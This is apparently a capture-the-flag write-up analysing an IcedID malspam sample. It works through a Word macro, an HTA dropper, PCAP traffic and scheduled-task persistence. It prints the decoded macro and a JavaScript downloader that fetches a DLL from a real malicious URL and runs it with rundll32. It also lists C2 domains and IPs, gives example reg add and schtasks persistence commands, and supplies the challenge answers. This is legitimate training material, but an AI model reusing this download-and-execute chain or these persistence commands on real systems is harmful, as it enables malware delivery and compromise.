IcedID malware family
Challenge Description
Solution and Analysis
Extract the files from the password protected archive to begin the analysis.
Question 1: What is the sha256 hash for the malspam attachment?
To get this run this command in the terminal where the files are located
sha256sum ./*
For the first answer you need to submit the SHA256 hash of the .doc file.
Question 2: What is the child process command line when the user enabled the Macro?
We can use oletools which help us detect if the docs has a Macro or not, first install the tool using the following code
pip3 install -U oletools
and run this command
olevba 'docs 06.02.2021.doc'
olevba 0.60.2 on Python 3.8.10 - http://decalage.info/python/oletools
===============================================================================
FILE: docs 06.02.2021.doc
Type: OpenXML
WARNING For now, VBA stomping cannot be detected for files in memory
-------------------------------------------------------------------------------
VBA MACRO ThisDocument.cls
in file: word/vbaProject.bin - OLE stream: 'VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO leftSize.bas
in file: word/vbaProject.bin - OLE stream: 'VBA/leftSize'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Sub autoopen()
initVba
Shell "explorer collectionBoxConst.hta", vbNormalFocus
End Sub
-------------------------------------------------------------------------------
VBA MACRO arrayBBorder.bas
in file: word/vbaProject.bin - OLE stream: 'VBA/arrayBBorder'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Sub initVba()
Open "collectionBoxConst.hta" & buttTemplateHeader For Output As #1
Print #1, ActiveDocument.Range.Text
Close #1
End Sub
+----------+--------------------+---------------------------------------------+
|Type |Keyword |Description |
+----------+--------------------+---------------------------------------------+
|AutoExec |autoopen |Runs when the Word document is opened |
|Suspicious|Open |May open a file |
|Suspicious|Output |May write to a file (if combined with Open) |
|Suspicious|Print # |May write to a file (if combined with Open) |
|Suspicious|Shell |May run an executable file or a system |
| | |command |
|Suspicious|vbNormalFocus |May run an executable file or a system |
| | |command |
|Suspicious|Base64 Strings |Base64-encoded strings were detected, may be |
| | |used to obfuscate strings (option --decode to|
| | |see all) |
|IOC |collectionBoxConst.h|Executable file name |
| |ta | |
+----------+--------------------+---------------------------------------------+
Based on the olevba output, the answer is:
explorer collectionBoxConst.hta
Question 3: What is the HTML Application file's sha256 hash from previous question?
This can be found in the output found in question 1
Question 4: Based on the previous question, what is the DLL run method?
okay so open the .hta file in a notepad or texteditor... you will have this on the first line
id='copyCurrencyMemory'>fX17KWUoaGN0YWN9O2Vzb2xjLnRzTHJhdjspMiAsImdwai50c25vQ3hvQm5vaXRjZWxsb2NcXGNpbGJ1cFxcc3Jlc3VcXDpjIihlbGlmb3RldmFzLnRzTHJhdjspeWRvYmVzbm9wc2VyLlJyZWdldG5JZXRhZChldGlydy50c0xyYXY7MSA9IGVweXQudHNMcmF2O25lcG8udHNMcmF2OykibWFlcnRzLmJkb2RhIih0Y2VqYk9YZXZpdGNBIHdlbiA9IHRzTHJhdiByYXZ7eXJ0eykwMDIgPT0gc3V0YXRzLlJyZWdldG5JZXRhZChmaTspKGRuZXMuUnJlZ2V0bklldGFkOyllc2xhZiAsIkNYTWpPb0dUNDJDV2JNNzZzMWN3RD1xJjA5TWtubFF2WkdCQUYyRGRGUlZ5TDEyZ2dWWnU9aGNyYWVzJlQyOTJEb01IbT1yZXN1JmZwNHJWPWRpJnllRFBPWGREUDZJNGhXeDlqaD1xJm5mVWcwczladENhVnk9dUp3Uzl5OWkmSmk4bjJLMT1lZ2FwJm5GdmVJckh5NUZMWjExWFV5RDRnY2JvcTA9ZW1pdCZ2YmZrSXNSbmE9cmVzdT81ZXNvcy9OUElyR2drUDZSQUFIVlZLQ2NlUngwVlZCNlR1dEx6emlOUUovN1lXeGlRQWtPbk9CeDUvVC9hZGRhL21vYy56ZXJ1bGNjbWVzcnVvYy8vOnB0dGgiICwiVEVHIihuZXBvLlJyZWdldG5JZXRhZDspInB0dGhsbXguMmxteHNtIih0Y2VqYk9YZXZpdGNBIHdlbiA9IFJyZWdldG5JZXRhZCByYXY=aGVsbG8fXspdHhlTnhlZG5JeGVkbmkoaGN0YWN9Oyl0Y2VqYk9Wb3BlcihlbGlmZXRlbGVkLnRjdXJ0U0xzZXR5YjsiYXRoLnRzbm9DeG9Cbm9pdGNlbGxvY1xcIiArIHlyb3RjZXJpRHRuZXJydUMudHNub0NlY25lcmVmZVJ0c3VydCA9IHRjZWpiT1ZvcGVye3lydDspInRpbkluaWd1bFAsZ3BqLnRzbm9DeG9Cbm9pdGNlbGxvY1xcY2lsYnVwXFxzcmVzdVxcOmMgMjNsbGRudXIiKG51ci50c25vQ2VjbmVyZWZlUnRzdXJ0OykidGNlamJvbWV0c3lzZWxpZi5nbml0cGlyY3MiKHRjZWpiT1hldml0Y0Egd2VuID0gdGN1cnRTTHNldHliIHJhdjspImxsZWhzLnRwaXJjc3ciKHRjZWpiT1hldml0Y0Egd2VuID0gdHNub0NlY25lcmVmZVJ0c3VydCByYXY=aGVsbG8msscriptcontrol.scriptcontrol
in here you can get 2 base64 scripts, the first one is
fX17KWUoaGN0YWN9O2Vzb2xjLnRzTHJhdjspMiAsImdwai50c25vQ3hvQm5vaXRjZWxsb2NcXGNpbGJ1cFxcc3Jlc3VcXDpjIihlbGlmb3RldmFzLnRzTHJhdjspeWRvYmVzbm9wc2VyLlJyZWdldG5JZXRhZChldGlydy50c0xyYXY7MSA9IGVweXQudHNMcmF2O25lcG8udHNMcmF2OykibWFlcnRzLmJkb2RhIih0Y2VqYk9YZXZpdGNBIHdlbiA9IHRzTHJhdiByYXZ7eXJ0eykwMDIgPT0gc3V0YXRzLlJyZWdldG5JZXRhZChmaTspKGRuZXMuUnJlZ2V0bklldGFkOyllc2xhZiAsIkNYTWpPb0dUNDJDV2JNNzZzMWN3RD1xJjA5TWtubFF2WkdCQUYyRGRGUlZ5TDEyZ2dWWnU9aGNyYWVzJlQyOTJEb01IbT1yZXN1JmZwNHJWPWRpJnllRFBPWGREUDZJNGhXeDlqaD1xJm5mVWcwczladENhVnk9dUp3Uzl5OWkmSmk4bjJLMT1lZ2FwJm5GdmVJckh5NUZMWjExWFV5RDRnY2JvcTA9ZW1pdCZ2YmZrSXNSbmE9cmVzdT81ZXNvcy9OUElyR2drUDZSQUFIVlZLQ2NlUngwVlZCNlR1dEx6emlOUUovN1lXeGlRQWtPbk9CeDUvVC9hZGRhL21vYy56ZXJ1bGNjbWVzcnVvYy8vOnB0dGgiICwiVEVHIihuZXBvLlJyZWdldG5JZXRhZDspInB0dGhsbXguMmxteHNtIih0Y2VqYk9YZXZpdGNBIHdlbiA9IFJyZWdldG5JZXRhZCByYXY
and the other is
fXspdHhlTnhlZG5JeGVkbmkoaGN0YWN9Oyl0Y2VqYk9Wb3BlcihlbGlmZXRlbGVkLnRjdXJ0U0xzZXR5YjsiYXRoLnRzbm9DeG9Cbm9pdGNlbGxvY1xcIiArIHlyb3RjZXJpRHRuZXJydUMudHNub0NlY25lcmVmZVJ0c3VydCA9IHRjZWpiT1ZvcGVye3lydDspInRpbkluaWd1bFAsZ3BqLnRzbm9DeG9Cbm9pdGNlbGxvY1xcY2lsYnVwXFxzcmVzdVxcOmMgMjNsbGRudXIiKG51ci50c25vQ2VjbmVyZWZlUnRzdXJ0OykidGNlamJvbWV0c3lzZWxpZi5nbml0cGlyY3MiKHRjZWpiT1hldml0Y0Egd2VuID0gdGN1cnRTTHNldHliIHJhdjspImxsZWhzLnRwaXJjc3ciKHRjZWpiT1hldml0Y0Egd2VuID0gdHNub0NlY25lcmVmZVJ0c3VydCByYXY
This 2nd one has the word aGVsbG8 in the front remove it to get the proper base64 strings, first decode it from base64 and reverse the strings this is done on cyberchef to get the following results
The combined code is
var dateIntegerR = new ActiveXObject("msxml2.xmlhttp");dateIntegerR.open("GET", "http://coursemcclurez.com/adda/T/5xBOnOkAQixWY7/JQNizzLtuT6BVV0xRecCKVVHAAR6PkgGrIPN/sose5?user=anRsIkfbv&time=0qobcg4DyUX11ZLF5yHrIevFn&page=1K2n8iJ&i9y9SwJu=yVaCtZ9s0gUfn&q=hj9xWh4I6PDdXOPDey&id=Vr4pf&user=mHMoD292T&search=uZVgg21LyVRFdD2FABGZvQlnkM90&q=Dwc1s67MbWC24TGoOjMXC", false);dateIntegerR.send();if(dateIntegerR.status == 200){try{var varLst = new ActiveXObject("adodb.stream");varLst.open;varLst.type = 1;varLst.write(dateIntegerR.responsebody);varLst.savetofile("c:\\users\\public\\collectionBoxConst.jpg", 2);varLst.close;}catch(e){}}
var trustReferenceConst = new ActiveXObject("wscript.shell");var bytesLStruct = new ActiveXObject("scripting.filesystemobject");trustReferenceConst.run("rundll32 c:\\users\\public\\collectionBoxConst.jpg,PluginInit");try{repoVObject = trustReferenceConst.CurrentDirectory + "\\collectionBoxConst.hta";bytesLStruct.deletefile(repoVObject);}catch(indexIndexNext){}
Summary of the Full Attack Chain
Stage 1 (Entry): The user is tricked into opening a Word document and enabling macros.
Stage 2 (Dropper): The VBA macro runs, which launches collectionBoxConst.hta.
Stage 3 (Downloader): The first part of the HTA's script downloads the malicious DLL from a server and saves it as c:\users\public\collectionBoxConst.jpg to evade detection.
Stage 4 (Execution): The second part of the HTA's script (the code you just found) uses wscript.shell to execute the downloaded DLL via rundll32.exe, calling the PluginInit function.
Stage 5 (Cleanup): The HTA script then deletes itself to remove the initial evidence of the dropper.
Answer to question 4: "C:\Windows\System32\rundll32.exe" c:\users\public\collectionBoxConst.jpg,PluginInit
Question 5: What is the image file dll installer sha256 hash from previous question?
This question is referring to the .dll file with the .jpg file extension which was downloaded.
This answer is in the first command answered in the first question itself
Question 6: What are the IP address and its domain name hosted installer DLL?
we know the domain http://coursemcclurez.com, open the PCAP file and in the display filter put in DNS. And we get this result
Right click on the 2nd one and click copy summary as text, the IP and the DNS is found, this is the answer to this question
Question 7: What is the full URL for the DLL installer?
This is found in the decoded javascript code above
http://coursemcclurez.com/adda/T/5xBOnOkAQixWY7/JQNizzLtuT6BVV0xRecCKVVHAAR6PkgGrIPN/sose5?user=anRsIkfbv&time=0qobcg4DyUX11ZLF5yHrIevFn&page=1K2n8iJ&i9y9SwJu=yVaCtZ9s0gUfn&q=hj9xWh4I6PDdXOPDey&id=Vr4pf&user=mHMoD292T&search=uZVgg21LyVRFdD2FABGZvQlnkM90&q=Dwc1s67MbWC24TGoOjMXC
Question 8: What are the two IP addresses identified as C2 servers?
This can be again found in the dns result in wireshark
most of the domains are being routed to 185[.]33[.]85[.]35 and there are two more, 194[.]5[.]249[.]46 and 172[.]67[.]169[.]49, the first two is the right answer
Question 9: What are the four C2 domains identified in the PCAP file?
We know that the C2 IP addresses and just need to what domains queried to these addresses and they are as follows fimlubindu.top kilodaser4.fit arhannexa5.top extrimefigim.top
submit it in alphabetical order to get the correct answer
Question 10: After the DLL installer being executed, what are the two domains that were being contacted by the installer DLL?
Query dns in the display filter of wireshark again, order it according to the time. You will see this
as you can see http://coursemcclurez.com was contacted first and after that aws.amazon.com and supplementik.top has been contacted, we can safely assume that after the DLL installer was downloaded from the first domain it then contacted these 2 domains.
Question 11: The malware generated traffic to an IP address over port 8080 with two SYN requests, what is the IP address?
in the display filter enter this command tcp.port == 8080 and the first IP with 2 SYN packets you get is the answer
Question 12: The license.dat file was used to create persistance on the user's machine, what is the dll run method for the persistance?
To get this open up the 2021-06-02-scheduledtasks.txt in around line 44 you can see the exact command that was used to create presistance.
C:\Users\user1\AppData\Local\user1\Tetoomdu64.dll",update /i:"ComicFantasy\license.dat
the full command being executed is
rundll32.exe "C:\Users\user1\AppData\Local\user1\Tetoomdu64.dll",update /i:"ComicFantasy\license.dat"
- Executor:
rundll32.exe- A legitimate Windows process used to run code from a DLL. This is a "Living Off the Land" (LOLBAS) technique.
- Malicious DLL:
Tetoomdu64.dll- The file containing the malicious code.
- Function & Argument:
,update /i:"ComicFantasy\license.dat"- Tells
rundll32.exeto run the exported function namedupdateinside the DLL. - The function is passed
ComicFantasy\license.datas an argument, likely a configuration file.
- Tells
2. How the Command is Made Persistent
The command above is placed in a system location that Windows automatically runs.
-
Method A: Registry Run Key (Most Common)
- The command is added as a value to a registry key that is executed on user logon.
- Key Path:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run - Example Command to Create:
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "UpdateTask" /t REG_SZ /d "rundll32.exe C:\...\Tetoomdu64.dll,update ..."
-
Method B: Scheduled Task
- A new task is created to run the command on a specific trigger (e.g., user logon).
- Example Command to Create:
schtasks /create /sc ONLOGON /tn "LicenseChecker" /tr "rundll32.exe C:\...\Tetoomdu64.dll,update ..."
3. Summary of Roles
| Component | Role | Example |
|---|---|---|
| Persistence | The "Launcher" | Registry Run Key or Scheduled Task |
| Executor | The "Runner" | rundll32.exe |
| Payload | The "Malware" | The update function in Tetoomdu64.dll |
| Configuration | The "Instructions" | The contents of license.dat |
Question 13: With OSINT, what is the malware family name used in this PCAP capture?
The name is IcedID this can be found using virustotal
Take any of the hashes obtained earlier and input it in virustotal to get this
Question 14: Based on Palo Alto Unit 42, what is the APT Group name?
Just google this APT Group name of IcedID malware family palo alto and you will get the result TA551
Question 15: What is the Mitre Attack code for the initial access in this campaign?
Go to the MITRE ATT@CK Framework and search TA551 you should go to this page https://attack.mitre.org/groups/G0127/
The one that worked for me was T1566.001